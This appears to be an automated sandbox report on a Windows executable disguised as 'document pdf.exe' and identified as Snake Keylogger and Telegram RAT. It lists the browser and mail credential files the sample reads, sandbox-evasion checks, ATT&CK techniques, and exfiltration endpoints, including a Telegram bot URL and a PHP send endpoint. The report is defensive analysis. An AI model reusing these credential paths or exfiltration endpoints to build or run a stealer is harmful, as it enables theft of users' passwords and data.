                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: document pdf.exe, 00000003.00000002.4662850359.0000000000B66000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Users\user\Desktop\document pdf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeCode function: 3_2_06699548 LdrInitializeThunk,3_2_06699548
                Source: C:\Users\user\Desktop\document pdf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess created: C:\Users\user\Desktop\document pdf.exe "C:\Users\user\Desktop\document pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Users\user\Desktop\document pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Users\user\Desktop\document pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\document pdf.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.document pdf.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.43ee280.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.document pdf.exe.4431ca0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 2672, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		21
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Disable or Modify Tools                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture3
                Ingress Tool Transfer                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                System Network Configuration Discovery                		SSHKeylogging3
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Obfuscated Files or Information                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input Capture24
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                document pdf.exe74%VirustotalBrowse
                document pdf.exe66%ReversingLabsByteCode-MSIL.Trojan.SnakeKeylogger
                document pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://us2.smtp.mailhostbox.com0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                us2.smtp.mailhostbox.com
                		208.91.199.225
                		truetrue
                  		unknown
                  s-part-0017.t-0009.t-msedge.net
                  		13.107.246.45
                  		truefalse
                    		high
                    reallyfreegeoip.org
                    		188.114.96.3
                    		truefalse
                      		high
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high
                        checkip.dyndns.com
                        		132.226.8.169
                        		truefalse
                          		high
                          18.31.95.13.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		high
                            checkip.dyndns.org
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                		high
                                http://checkip.dyndns.org/false
                                  		high
                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20and%20Time:%2007/01/2025%20/%2000:14:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20680718%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.office.com/document pdf.exe, 00000003.00000002.4665157890.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/chrome_newtabdocument pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.orgdocument pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icodocument pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegram.org/botdocument pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                		high
                                                http://us2.smtp.mailhostbox.comdocument pdf.exe, 00000003.00000002.4665157890.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.office.com/lBdocument pdf.exe, 00000003.00000002.4665157890.0000000002C33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://upx.sf.netAmcache.hve.6.drfalse
                                                      		high
                                                      http://checkip.dyndns.orgdocument pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://chrome.google.com/webstore?hl=endocument pdf.exe, 00000003.00000002.4665157890.0000000002C07000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://varders.kozow.com:8081document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://aborters.duckdns.org:8081document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:680718%0D%0ADate%20adocument pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://51.38.247.67:8081/_send_.php?Ldocument pdf.exe, 00000003.00000002.4665157890.0000000002C63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://chrome.google.com/webstore?hl=enhdocument pdf.exe, 00000003.00000002.4665157890.0000000002BF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://anotherarmy.dns.army:8081document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdocument pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://checkip.dyndns.org/qdocument pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://chrome.google.com/webstore?hl=enlBdocument pdf.exe, 00000003.00000002.4665157890.0000000002C02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.orgdocument pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B57000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.office.com/hdocument pdf.exe, 00000003.00000002.4665157890.0000000002C29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedocument pdf.exe, 00000003.00000002.4665157890.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=document pdf.exe, 00000003.00000002.4667808438.0000000003A91000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4667808438.0000000003D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodeddocument pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://reallyfreegeoip.org/xml/document pdf.exe, 00000000.00000002.2273766316.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4665157890.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, document pdf.exe, 00000003.00000002.4662245405.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  		high

                                                                                                  World Map of Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public IPs

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  132.226.8.169
                                                                                                  		checkip.dyndns.comUnited States
                                                                                                  		16989UTMEMUSfalse
                                                                                                  149.154.167.220
                                                                                                  		api.telegram.orgUnited Kingdom
                                                                                                  		62041TELEGRAMRUfalse
                                                                                                  188.114.96.3
                                                                                                  		reallyfreegeoip.orgEuropean Union
                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                  208.91.199.225
                                                                                                  		us2.smtp.mailhostbox.comUnited States
                                                                                                  		394695PUBLIC-DOMAIN-REGISTRYUStrue

                                                                                                  General Information

                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1584835
                                                                                                  Start date and time:2025-01-06 16:00:08 +01:00
